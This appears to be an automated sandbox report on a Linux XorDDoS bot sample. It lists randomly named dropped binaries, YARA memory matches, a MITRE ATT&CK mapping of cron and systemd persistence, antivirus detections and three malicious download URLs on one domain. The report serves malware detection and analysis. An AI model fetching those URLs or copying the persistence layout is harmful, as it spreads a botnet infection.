Source: /usr/bin/cpbnjarskl (PID: 6350)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6353)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6355)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6358)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6364)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6367)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6370)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6372)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6375)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6383)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6386)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6389)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6391)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6394)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6403)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6406)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6409)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6412)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6415)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6420)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6423)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6425)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6428)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6431)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6437)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6440)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6442)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6445)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6448)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6454)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6457)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6460)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6462)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6465)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6471)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6474)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6477)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6479)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6483)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6489)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6492)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6495)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6498)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6500)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6506)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6509)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6512)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6514)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6517)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6525)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6528)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6531)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6534)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6537)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6543)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6546)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6549)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6551)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6554)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6560)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6562)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6565)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6567)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6571)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6577)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6579)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6582)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6585)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6587)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6597)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6599)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6602)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6604)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6608)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6614)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6616)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6619)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6621)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6625)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkpssqmflq (PID: 6631)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkpssqmflq (PID: 6633)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkpssqmflq (PID: 6636)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkpssqmflq (PID: 6638)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkpssqmflq (PID: 6642)	Queries kernel information via 'uname':			Jump to behavior

Source: /tmp/1.elf (PID: 6205)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: 1.elf, type: SAMPLE
Source: Yara match	File source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6317.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6206.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6277.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6206, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6207, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6238, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6241, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6246, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6249, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6257, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6263, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6265, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6274, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6277, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6279, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6282, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6285, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6315, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6317, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6323, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6329, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6335, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6337, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6346, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6349, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6351, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6354, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6357, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6363, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6366, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6371, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6374, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6382, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6385, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6390, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6393, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6402, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6405, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6411, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6414, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6419, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6422, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6427, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6430, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6439, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6441, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6447, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6453, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6458, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6461, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6470, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6473, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6475, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6478, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6482, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6491, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6494, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6499, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6505, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6510, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6513, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6527, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6529, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6533, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6535, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/ssrfvzfvpk, type: DROPPED
Source: Yara match	File source: /usr/bin/uaewjndswe, type: DROPPED
Source: Yara match	File source: /usr/bin/cpbnjarskl, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/wxysocrflf, type: DROPPED
Source: Yara match	File source: /usr/bin/efgdvbpuxx, type: DROPPED
Source: Yara match	File source: /usr/bin/ccxfvtbhgr, type: DROPPED
Source: Yara match	File source: /usr/bin/lkzqkklpfr, type: DROPPED
Source: Yara match	File source: /usr/bin/ezztyrfjzf, type: DROPPED
Source: Yara match	File source: /usr/bin/dyuvutukki, type: DROPPED
Source: Yara match	File source: /usr/bin/vapcvdizxx, type: DROPPED
Source: Yara match	File source: /usr/bin/nxattrsdxm, type: DROPPED
Source: Yara match	File source: /usr/bin/bjhrrojebv, type: DROPPED
Source: Yara match	File source: /usr/bin/vlteqhfomz, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Scripting	1 Systemd Service	1 Systemd Service	12 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 At (Linux)	2 At (Linux)	2 At (Linux)	2 Scripting	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Ingress Tool Transfer	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

Threatname: XorDDoS

{"C2 list": []}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1.elf	87%	ReversingLabs	Linux.Network.XorDDoS
1.elf	100%	Avira	LINUX/Xorddos.cona
1.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/bin/vlteqhfomz	100%	Avira	LINUX/Xorddos.cona
/usr/bin/lkzqkklpfr	100%	Avira	LINUX/Xorddos.cona
/usr/bin/vapcvdizxx	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wxysocrflf	100%	Avira	LINUX/Xorddos.cona
/usr/bin/uaewjndswe	100%	Avira	LINUX/Xorddos.cona
/usr/lib/libudev.so	100%	Avira	LINUX/Xorddos.cona
/usr/bin/efgdvbpuxx	100%	Avira	LINUX/Xorddos.cona
/usr/bin/nxattrsdxm	100%	Avira	LINUX/Xorddos.cona
/usr/bin/dyuvutukki	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ezztyrfjzf	100%	Avira	LINUX/Xorddos.cona
/usr/bin/bjhrrojebv	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ccxfvtbhgr	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ssrfvzfvpk	100%	Avira	LINUX/Xorddos.cona
/usr/bin/cpbnjarskl	100%	Avira	LINUX/Xorddos.cona
/usr/bin/vlteqhfomz	100%	Joe Sandbox ML
/usr/bin/lkzqkklpfr	100%	Joe Sandbox ML
/usr/bin/vapcvdizxx	100%	Joe Sandbox ML
/usr/bin/wxysocrflf	100%	Joe Sandbox ML
/usr/bin/uaewjndswe	100%	Joe Sandbox ML
/usr/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/efgdvbpuxx	100%	Joe Sandbox ML
/usr/bin/nxattrsdxm	100%	Joe Sandbox ML
/usr/bin/dyuvutukki	100%	Joe Sandbox ML
/usr/bin/ezztyrfjzf	100%	Joe Sandbox ML
/usr/bin/bjhrrojebv	100%	Joe Sandbox ML
/usr/bin/ccxfvtbhgr	100%	Joe Sandbox ML
/usr/bin/ssrfvzfvpk	100%	Joe Sandbox ML
/usr/bin/cpbnjarskl	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	28%	ReversingLabs	Linux.Trojan.XorDDoS
/usr/bin/ssrfvzfvpk	78%	ReversingLabs	Linux.Network.XorDDoS
/usr/lib/libudev.so	87%	ReversingLabs	Linux.Network.XorDDoS

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gv	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ua	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9dy	100%	Avira URL Cloud	malware
